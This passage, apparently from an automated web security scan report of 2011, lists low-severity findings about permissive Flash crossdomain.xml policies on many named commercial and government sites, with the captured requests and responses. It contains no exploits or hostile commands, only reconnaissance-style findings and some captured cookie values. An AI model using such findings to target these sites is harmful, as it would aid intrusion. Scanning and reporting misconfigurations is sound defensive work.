Date: Sat, 02 Apr 2011 13:41:28 GMT
Content-Type: text/xml
Content-Length: 307
Last-Modified: Thu, 31 Mar 2011 23:27:03 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.polaritylabs.com"/>
<allow-access-from domain="polaritylabs.com"/>
<allow-access-from domain="*.goodreads.com"/>
<allow-access-from domain="goodreads.com"/>
...[SNIP]...

7.280. http://www.guardian.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:59 GMT
Server: Apache
Set-Cookie: GU_MU=VFpjbFR3cjZERTRBQUI2bHNlOEFBQURwfHVpTlFhT1BjZy9mWkVDalBsYXBVOEE9PQ==; path=/; domain=.guardian.co.uk; expires=Tue, 30-Mar-2021 13:31:59 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDI0OTY5MTM0MjAxODkzODYyNzI3NTIyMTQwMTk0MTgzMTk1MjAyNDQ=; path=/; domain=.guardian.co.uk; expires=Sat, 23-Apr-2011 13:31:59 GMT
Last-Modified: Thu, 01 Apr 2010 16:14:58 GMT
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:31:59 GMT
X-GU-httpd: 05
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- why are we doing this? See here: ht
...[SNIP]...
<allow-access-from domain="*.bs.preview.serving-sys.com"/>
<allow-access-from domain="199.106.209.225"/>
<allow-access-from domain="*.ds.serving-sys.com"/>
<allow-access-from domain="199.106.209.197"/>
<allow-access-from domain="*.bs.serving-sys.com"/>
<allow-access-from domain="80.252.91.41"/>
<allow-access-from domain="*.eyeblasterwiz.com"/>
<allow-access-from domain="199.106.209.196"/>
<allow-access-from domain="*.ebsearch.eyeblasterwiz.com"/>
<allow-access-from domain="62.249.238.93"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="web2.dreamleague.co.uk"/>
<allow-access-from domain="fantasyfootball.guardian.co.uk"/>
<allow-access-from domain="*.jumpmediagroup.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="adimage.guardian.co.uk"/>
<allow-access-from domain="static.guim.co.uk"/>
<allow-access-from domain="*.gnl" />
...[SNIP]...

7.281. http://www.hallmark.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hallmark.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hallmark.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 07:08:26 GMT
Accept-Ranges: bytes
ETag: "88bea06fbbeacb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
WEBHOST: CW128
Content-Length: 535
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 14:14:54 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="www.hallmark.com"/>
   <allow-access-from domain="*.hmkb2c.com"/>
   <allow-access-from domain="*.hallmark.com"/>
   <allow-access-from domain="digitalassets.hallmark.com"/>
   <allow-access-from domain="digitaltransfer.hallmark.com"/>
   <allow-access-from domain="*.hmkdev.com"/>
   <allow-access-from domain="*.alvenda.com"/>
   <allow-access-from domain="*.alvenda.net"/>
   <allow-access-from domain="*.akamai.net"/>
<allow-access-from domain="67.199.75.155"/>
...[SNIP]...

7.282. http://www.hbo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hbo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hbo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:40 GMT
Server: Apache
Last-Modified: Wed, 26 Jan 2011 20:20:12 GMT
ETag: "6a0-41b-49ac58f677700"
Accept-Ranges: bytes
Content-Length: 1051
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 14:16:40 GMT
g: u
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE
cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="hbo.com" />
<allow-access-from domain="*.hbo.com" />
<allow-access-from domain="*.cdn.hbo.com" />
<allow-access-from domain="*.homebox.com" />
<allow-access-from domain="*.homeboxoffice.com" />
<allow-access-from domain="localhost" />
<allow-access-from domain="127.0.0.1" />
<allow-access-from domain="*.sprodhbo.homebox.com" />
<allow-access-from domain="myspacecdn.com" />
<allow-access-from domain="*.myspacecdn.com" />
<allow-access-from domain="*.myspace.com" />
<allow-access-from domain="myspace.com" />
<allow-access-from domain="*.gmodules.com" />
<allow-access-from domain="gmodules.com" />
<allow-access-from domain="farm.sproutbuilder.com"/>
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="facebook.com" />
...[SNIP]...

7.283. http://www.healthcentral.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.healthcentral.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR CONi OUR DELi SAMi OTRi STP STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Accept-Ranges: bytes
Last-Modified: Wed, 14 Oct 2009 16:46:43 GMT
ETag: "1CA4CEDE8CA1B80:1CBF07678218642"
Content-Type: text/xml
Content-Length: 362
Cache-Control: public, max-age=1555
Expires: Sat, 02 Apr 2011 14:09:52 GMT
Date: Sat, 02 Apr 2011 13:43:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com" />
<allow-access-from domain="*.choicemedia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.healthcentral.com" secure="false" />
...[SNIP]...

7.284. http://www.hgtv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hgtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hgtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 15 Jul 2010 03:51:40 GMT
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:45:24 GMT
Content-Length: 1200
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.hgtvpro.com"/>
<allow-access-from domain="*.hgtv.com"/>
<allow-access-from domain="*.diynetwork.com"/>
<allow-access-from domain="*.diynet.com"/>
<allow-access-from domain="*.fineliving.com"/>
<allow-access-from domain="*.food.com"/>
<allow-access-from domain="*.foodnetwork.com"/>
<allow-access-from domain="*.gactv.com"/>
<allow-access-from domain="*.ecologue.com"/>
<allow-access-from domain="*.scripps.com"/>
<allow-access-from domain="*.scrippsonline.com"/>
<allow-access-from domain="*.hottrends2005.com"/>
<allow-access-from domain="*.hottrends2006.com"/>
<allow-access-from domain="*.scrippsnetworks.com"/>
<allow-access-from domain="72.3.226.28" />
<allow-access-from domain="64.225.232.166" />
<allow-access-from domain="*.videomment.com" />
<allow-access-from domain="*.widgets.isg-marketing.com" />
<allow-access-from domain="*.videomerce.com"/>
<allow-access-from domain="*.5Min.com"/>
<allow-access-from domain="*.sndimg.com"/>
...[SNIP]...

7.285. http://www.hhs.gov/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hhs.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hhs.gov

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/xml; charset=UTF-8
Last-Modified: Tue, 21 Jul 2009 14:44:48 GMT
Content-Length: 230
ETag: "e6-4a65d460"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 14:20:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...

7.286. http://www.hi5.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hi5.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hi5.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"414-1286911046000"
Last-Modified: Tue, 12 Oct 2010 19:17:26 GMT
Content-Type: application/xml
Content-Length: 414
Date: Sat, 02 Apr 2011 13:34:02 GMT
Connection: keep-alive
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246b2193660;expires=Sat, 02-Apr-11 14:16:47 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.mysite.com -->
<cross-domain-policy>
<allow-access-from domain="*.hi5.com" />
<allow-access-from domain="hi5.com" />
<allow-access-from domain="x.mochiads.com" />
<allow-access-from domain="*.socialmoraygames.com"/>
...[SNIP]...

7.287. http://www.history.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.history.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.history.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix)
Last-Modified: Mon, 21 Mar 2011 16:37:50 GMT
ETag: "1720927-d1-49f00bf96f380"
Accept-Ranges: bytes
Content-Length: 209
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:44:47 GMT
Connection: close
X-N: S

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.h9story.com" />
   <allow-access-from domain="*.history.com" />
</cross-domai
...[SNIP]...

7.288. http://www.hollywood.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hollywood.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hollywood.com

Response

HTTP/1.1 200 OK
Content-Length: 354
Content-Type: text/xml
Last-Modified: Thu, 22 Apr 2010 18:33:10 GMT
Accept-Ranges: bytes
ETag: "07739424ae2ca1:8d9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:32:57 GMT
Connection: close

<?xml version="1.0" ?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.hollywood.com" />
   <allow-access-from domain="*.brightcove.com" />
   <!-- f
...[SNIP]...
<allow-access-from domain="*.cooliris.com" />
...[SNIP]...

7.289. http://www.hollywoodlife.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hollywoodlife.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hollywoodlife.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Last-Modified: Mon, 12 Apr 2010 23:01:21 GMT
Server: nginx/0.7.62
Content-Length: 267
Expires: Sat, 02 Apr 2011 13:54:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:54:08 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.vimg.net" />
<allow-access-from domain="*.hollywoodlife.com" />
...[SNIP]...

7.290. http://www.homedepot.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.homedepot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homedepot.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Thu, 16 Oct 2008 20:46:36 GMT
ETag: "1023-1c7-f1d96300"
Accept-Ranges: bytes
Content-Length: 455
Content-Type: text/xml
X-Pad: avoid browser bug
Cache-Control: max-age=37156
Date: Sat, 02 Apr 2011 13:24:42 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.homedepot.com" />
   <allow-access-from domain="homedepot.com" />
...[SNIP]...

7.291. http://www.hp.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hp.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:35 GMT
Server: Apache
Last-Modified: Mon, 17 May 2010 11:29:38 GMT
ETag: "8a41ec80"
Accept-Ranges: bytes
Content-Length: 213
Cache-Control: max-age=7200
Expires: Sat, 02 Apr 2011 14:43:35 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.hp.com" />
</cross-dom
...[SNIP]...

7.292. http://www.hsn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hsn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hsn.com

Response

HTTP/1.1 200 OK
Content-Length: 510
Content-Type: text/xml
Last-Modified: Wed, 23 Mar 2011 15:23:10 GMT
Accept-Ranges: bytes
ETag: "0c3ad376ee9cb1:101f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=AD33F804402E8C7B2B4472BF2E21085B; domain=.hsn.com; path=/
Set-Cookie: TLTHID=AD33F804402E8C7B2B4472BF2E21085B; domain=.hsn.com; path=/
Date: Sat, 02 Apr 2011 13:35:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.hsn.com" />
<allow-access-from domain="*.hsnlab.com" />
<allow-access-from domain="*.hsni.com" />
<allow-access-from domain="a1995.g.akamai.net"/>
<allow-access-from domain="a1995.b.akamai.net"/>
<allow-access-from domain="a248.e.akamai.net"/>
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...

7.293. http://www.hulu.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hulu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hulu.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Mar 2011 16:34:41 GMT
Server: nginx
Content-Type: text/xml
Content-Length: 347
Accept-Ranges: bytes
Cache-Control: max-age=547174
Expires: Fri, 08 Apr 2011 20:37:25 GMT
Date: Sat, 02 Apr 2011 12:37:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.hulu.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.tivo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

7.294. http://www.ichotelsgroup.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ichotelsgroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ichotelsgroup.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/xml
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Fri, 09 May 2008 23:45:44 GMT
ETag: "e5e5-10c-4824e228"
Accept-Ranges: bytes
Content-Length: 268
Expires: Sat, 02 Apr 2011 13:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:25 GMT
Connection: close
Set-Cookie: TLTSID=588654C85D2E105D09BCB05B6929DBA8; Path=/; Domain=.ichotelsgroup.com
Set-Cookie: TLTUID=588654C85D2E105D09BCB05B6929DBA8; Path=/; Domain=.ichotelsgroup.com; expires=Sat, 02-04-2021 13:37:25 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.intercontinental.com"/>
<allow-access-from domain="*.ichotelsgroup.com"/>
...[SNIP]...

7.295. http://www.ikea.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ikea.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ikea.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 04 Nov 2010 08:01:26 GMT
ETag: "cfc07-a11-908a4180"
Accept-Ranges: bytes
Content-Length: 2577
Content-Type: text/xml
Cache-Control: public, max-age=1800
Date: Sat, 02 Apr 2011 13:41:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.ikea.com" />
   <allow-access-from domain="*.ikea.be" />
   <allow-access-from domain="*.ikea.cz" />
   <allow-access-from domain="*.ikea.dk" />
   <allow-access-from domain="*.ikea.de" />
   <allow-access-from domain="*.ikea.es" />
   <allow-access-from domain="*.ikea.gr" />
   <allow-access-from domain="*.ikea.fr" />
   <allow-access-from domain="*.ikea.is" />
   <allow-access-from domain="*.ikea.com.cy" />
   <allow-access-from domain="*.ikea.hu" />
   <allow-access-from domain="*.ikea.nl" />
   <allow-access-from domain="*.ikea.no" />
   <allow-access-from domain="*.ikea.at" />
   <allow-access-from domain="*.ikea.ru" />
   <allow-access-from domain="*.ikea.pl" />
   <allow-access-from domain="*.ikea.pt" />
   <allow-access-from domain="*.ikea.ro" />
   <allow-access-from domain="*.ikea.ch" />
   <allow-access-from domain="*.ikea.sk" />
   <allow-access-from domain="*.ikea.fi" />
   <allow-access-from domain="*.ikea.se" />
   <allow-access-from domain="*.ikea.ie" />
   <allow-access-from domain="*.ikea.com.tr" />
   <allow-access-from domain="*.ikea.co.uk" />
   <allow-access-from domain="*.ikea.ca" />
   <allow-access-from domain="*.ikea.cn" />
   <allow-access-from domain="*.ikea.com.hk" />
   <allow-access-from domain="*.ikea.jp" />
   <allow-access-from domain="*.ikea.com.my" />
   <allow-access-from domain="*.ikea.com.tw" />
   <allow-access-from domain="*.ikea.com.sg" />
   <allow-access-from domain="*.ikeainfo.com" />
   <allow-access-from domain="*.ikeastampa.it" />
   <allow-access-from domain="*.ikea-family.net" />
   <allow-access-from domain="*.ikea-business.net" />
   <allow-access-from domain="*.business.ikea.com" />
   <allow-access-from domain="*.lebst-du-schon.com" />
   <allow-access-from domain="*.ikeacz.cz" />
   <allow-access-from domain="*.moovii.jp" />
   <allow-access-from domain="*.prototipo.sweb.info" />
   <allow-access-from domain="*.ikeadt.com" />
   <allow-access-from domain="*.gimlet.se" />
   <allow-access-from domain="*.kokokaka.com" />
<allow-access-from domain="*.weareyours.com" />
   <allow-access-from domain="*.ikea-canada.com"/>
   <allow-access-from domain="*.novaloznice.cz" />
<allow-access-from domain="*.novaspalna.sk" />
   <allow-access-from domain="*.ujhaloszoba.hu"/>
   <allow-access-from domain="*.cybercomhosting.com"/>
<allow-access-from domain="*.rebenga.se"/>
<allow-access-from domain="*.ikeagodjul.cz"/>
<allow-access-from domain="*.ikeagodjul.sk"/>
<allow-access-from domain="*.ikeagodjul.hu"/>
...[SNIP]...

7.296. http://www.ilike.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ilike.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ilike.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
P3P: policyref="http://www.ilike.com/p3p.xml", CP="CAO CUR ADM IVAo IVDo CONo OTPo OUR IND UNI NAV ONL INT PRE"
Date: Sat, 02 Apr 2011 12:13:14 GMT
X-App: lv-app82-170:80
Accept-Ranges: bytes
Last-Modified: Mon, 03 Jan 2011 23:38:16 GMT
Content-Length: 1178
Connection: Keep-Alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.ilike.com -->
<cross-domain-policy>
<allow-access-from domain="*.ilike.com" />
...[SNIP]...
<allow-access-from domain="*.google.com" />
...[SNIP]...
<allow-access-from domain="*.gmodules.com" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" />
...[SNIP]...
<allow-access-from domain="*.icast.com" />
<allow-access-from domain="*.gcast.com" />
<allow-access-from domain="*.garageband.com" />
...[SNIP]...
<allow-access-from domain="*.fotodunk.com" />
<allow-access-from domain="local" />
<allow-access-from domain="localhost" />
...[SNIP]...

7.297. http://www.imdb.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imdb.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:57 GMT
Server: Server
Last-Modified: Fri, 01 Apr 2011 05:36:11 GMT
ETag: "20e-49fd4c99968c0"
Accept-Ranges: bytes
Content-Length: 526
Cache-Control: max-age=315360000
Expires: Tue, 30 Mar 2021 12:37:57 GMT
nnCoection: close
Content-Type: text/xml
Vary: Accept-Encoding,User-Agent
